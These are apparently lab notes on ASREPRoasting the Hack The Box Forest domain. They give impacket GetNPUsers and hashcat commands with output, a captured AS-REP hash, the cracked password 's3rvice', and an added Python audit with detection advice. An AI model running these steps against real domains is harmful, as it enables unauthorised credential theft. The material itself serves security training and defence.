ASREPRoast

If a domain user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user without knowing the password, and the encrypted part of the reply can be cracked offline, much like Kerberoasting.
Prerequisite:
  • The target account must have the DONT_REQ_PREAUTH flag set in its userAccountControl attribute

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Example - 

python /usr/share/doc/python3-impacket/examples/GetNPUsers.py htb.local/ -usersfile service-account -format hashcat -outputfile htb-forest -no-pass -dc-ip 10.10.10.161

cat htb-forest 
$krb5asrep$23$svc-alfresco@HTB.LOCAL:3c1d3db1b2da65d232cc7c374d1ff8c0$903b23c1c8778717bb941a35fd68e4f58ba93e46ce1206ac6e834d34409bcb32a2e720bf561ed39d26005898d3869b25d2389f71aa82665dbb950d8412ad034cc58223a317734786b71132267f1cca966cf445776554fdebefeeeb5af65543b3058706cacd985aa07705486413a4943d1183fd32fcb72fe3d78b017d03ed44910e5175db9237b2b0a95334b7013c426c5da367c3f83f0a969a45ff889458f662140d7a8d57c64b943016ebd328351092b288f6627d38269d9824796266c0c8deb6ac0053eb438304d9983490f7557df7690bc25b0c8ad9fec323337e91cf1900b98bade2ca5b
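The following is an added example, not part of the original notes and not impacket's or hashcat's own code. It covers two defender-side checks for what is described above: auditing which accounts carry the DONT_REQ_PREAUTH bit in userAccountControl (the prerequisite), and parsing a hashcat-format $krb5asrep$ line like the one in htb-forest so the affected account can be identified from the file. The account records are constructed; the flag values are the standard Active Directory userAccountControl bits, and the hash line is the one printed above.

```python
import re

# Active Directory userAccountControl bits relevant to this check.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the DONT_REQ_PREAUTH flag from the prerequisite

# Constructed sample records standing in for an LDAP query returning
# (sAMAccountName, userAccountControl); these are not real directory data.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-alfresco",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "jdoe",
     "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "old-svc",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},
]

# The AS-REP line from htb-forest above, split only to keep the source readable.
SAMPLE_HASH = (
    "$krb5asrep$23$svc-alfresco@HTB.LOCAL:3c1d3db1b2da65d232cc7c374d1ff8c0$"
    "903b23c1c8778717bb941a35fd68e4f58ba93e46ce1206ac6e834d34409bcb32a2e720bf561ed39d26005898d3869b25d238"
    "9f71aa82665dbb950d8412ad034cc58223a317734786b71132267f1cca966cf445776554fdebefeeeb5af65543b3058706ca"
    "cd985aa07705486413a4943d1183fd32fcb72fe3d78b017d03ed44910e5175db9237b2b0a95334b7013c426c5da367c3f83f"
    "0a969a45ff889458f662140d7a8d57c64b943016ebd328351092b288f6627d38269d9824796266c0c8deb6ac0053eb438304"
    "d9983490f7557df7690bc25b0c8ad9fec323337e91cf1900b98bade2ca5b"
)


def audit_preauth(accounts):
    """Return accounts with DONT_REQ_PREAUTH set, split into enabled and disabled.

    The KDC refuses an AS-REQ for a disabled account, so only the enabled list
    is exposed to this technique; clearing the flag on those is the fix.
    """
    enabled, disabled = [], []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        name = acct["sAMAccountName"]
        (disabled if uac & UF_ACCOUNTDISABLE else enabled).append(name)
    return {"enabled": enabled, "disabled": disabled}


# hashcat mode 18200 layout, as written by GetNPUsers -format hashcat:
#   $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum hex>$<enc-part hex>[:<password once cracked>]
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@:$]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<cipher>[0-9a-fA-F]+)(?::(?P<password>.*))?$"
)


def parse_asrep_hash(line):
    """Split one $krb5asrep$ line into its fields; raises ValueError on anything else."""
    m = ASREP_RE.match(line.strip())
    if m is None:
        raise ValueError("not a hashcat-format $krb5asrep$ line")
    g = m.groupdict()
    if len(g["cipher"]) % 2:
        raise ValueError("enc-part hex has odd length")
    return {
        "etype": int(g["etype"]),          # 23 = RC4-HMAC, the type hashcat mode 18200 handles
        "user": g["user"],
        "realm": g["realm"],
        "checksum": g["checksum"].lower(),
        "cipher_bytes": len(g["cipher"]) // 2,
        "cracked": g["password"] is not None,  # hashcat --show appends ':<password>'
    }


if __name__ == "__main__":
    print("DONT_REQ_PREAUTH audit:", audit_preauth(SAMPLE_ACCOUNTS))
    print("parsed AS-REP line:", parse_asrep_hash(SAMPLE_HASH))
```

Running the audit on real data means reading userAccountControl for every user object over LDAP and feeding the results to audit_preauth; every enabled account it reports either needs the flag cleared or, where a legacy application truly requires it, a long random password that makes the offline crack impractical. On the detection side, the domain controller logs each AS-REP issued without pre-authentication as event 4768 with Pre-Authentication Type 0, which is the signal to alert on for this technique.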

Now crack the hash with hashcat:

# crack AS_REP messages
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 

Password Cracked!

$krb5asrep$23$svc-alfresco@HTB.LOCAL:3c1d3db1b2da65d232cc7c374d1ff8c0$903b23c1c8778717bb941a35fd68e4f58ba93e46ce1206ac6e834d34409bcb32a2e720bf561ed39d26005898d3869b25d2389f71aa82665dbb950d8412ad034cc58223a317734786b71132267f1cca966cf445776554fdebefeeeb5af65543b3058706cacd985aa07705486413a4943d1183fd32fcb72fe3d78b017d03ed44910e5175db9237b2b0a95334b7013c426c5da367c3f83f0a969a45ff889458f662140d7a8d57c64b943016ebd328351092b288f6627d38269d9824796266c0c8deb6ac0053eb438304d9983490f7557df7690bc25b0c8ad9fec323337e91cf1900b98bade2ca5b:s3rvice
